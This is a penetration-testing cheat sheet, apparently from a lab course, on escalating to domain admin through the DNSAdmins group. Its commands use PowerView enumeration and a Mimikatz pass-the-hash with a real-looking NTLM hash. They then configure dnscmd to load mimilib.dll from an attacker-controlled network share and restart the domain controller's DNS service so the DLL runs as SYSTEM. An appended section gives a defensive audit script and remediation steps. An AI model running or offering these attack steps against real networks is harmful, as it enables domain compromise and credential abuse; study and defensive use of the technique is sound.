Priv Esc – DNSAdmins

DNSAdmins

# Members of the DNSAdmins group can make dns.exe (running as SYSTEM) load an arbitrary DLL.
# If the DC also serves as DNS, this gives us escalation to DA.
# Requires the ability to restart the DNS service (the DLL is loaded at service start).



Import-Module .\PowerView.ps1

# Pull the members of the DNSAdmins group
Get-NetGroupMember DNSAdmins


# Once we know the members of the DNSAdmins group, we need to
# compromise one of them, which in this case is srvadmin.
# We already have the hash of srvadmin because of derivative local admin.


# Create a folder on our local computer at C:\dll,
# share it with Everyone and place mimilib.dll inside the folder.


# Once we have the hash of the DNSAdmins member (here srvadmin),
# we can invoke mimikatz to get a shell as that user:
# Open PowerShell as local administrator (IMPORTANT!)
Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /ntlm:a98e18228819e8eec3dfa33cb68b0728 /run:powershell.exe"'

# From the privileges of the DNSAdmins group member, configure the plugin DLL
# using dnscmd.exe (needs RSAT DNS):

# or it can be downloaded from here:
# https://api.256file.com/dnscmd.exe/m-download-233611.html
# and placed in C:\Windows\System32

dnscmd dcorp-dc /config /serverlevelplugindll \\172.16.50.100\dll\mimilib.dll


# Restart the DNS service
# (use sc.exe explicitly: inside PowerShell, "sc" is an alias for Set-Content)

sc.exe \\dcorp-dc stop dns
sc.exe \\dcorp-dc start dns

# By default, mimilib.dll logs all DNS queries to C:\Windows\System32\kiwidns.log
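Defender-side check for this technique, added here as an example (not part of the original notes). The `dnscmd /config /serverlevelplugindll` call above persists its value in the DNS service's `Parameters` registry key, and the DLL is only loaded on the next service restart, so the two things worth auditing are the current DNSAdmins membership and whether that value is set at all. Assumes the ActiveDirectory RSAT module on the auditing host and PowerShell remoting to the DNS servers; the server name `dcorp-dc` is taken from the page and is a placeholder.

```powershell
# Added example: audit DnsAdmins membership and the ServerLevelPluginDll setting.
# Assumptions: ActiveDirectory module installed, WinRM reachable on each DNS server.
param(
    [string[]]$DnsServers = @('dcorp-dc')   # placeholder hostname from the page
)

Import-Module ActiveDirectory

# 1. Who can currently set the plugin DLL? Nested membership counts too.
$members = Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
    Select-Object Name, SamAccountName, objectClass
Write-Host "DnsAdmins members (should be empty or a very short, known list):"
$members | Format-Table -AutoSize

# 2. Is a server-level plugin DLL configured? A clean server has no such value.
$regPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
foreach ($server in $DnsServers) {
    $plugin = Invoke-Command -ComputerName $server -ScriptBlock {
        param($p)
        (Get-ItemProperty -Path $p -Name 'ServerLevelPluginDll' -ErrorAction SilentlyContinue).ServerLevelPluginDll
    } -ArgumentList $regPath

    if ([string]::IsNullOrEmpty($plugin)) {
        Write-Host "[$server] ServerLevelPluginDll not set (expected)"
    }
    else {
        Write-Warning "[$server] ServerLevelPluginDll = $plugin"
        # dns.exe runs as SYSTEM; a UNC path means it will load code from a share on next restart.
        if ($plugin -like '\\*') {
            Write-Warning "[$server] plugin path is a network share; treat as an active compromise indicator"
        }
    }
}
```

Run it from a host that already holds DNS Server admin rights for the remoting step. To remediate a finding, delete the `ServerLevelPluginDll` value under that key (or set it to an empty string with `dnscmd`) and restart the DNS service so the loaded DLL is dropped, then review the service restart and group membership changes in the DC's event logs for the same time window.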



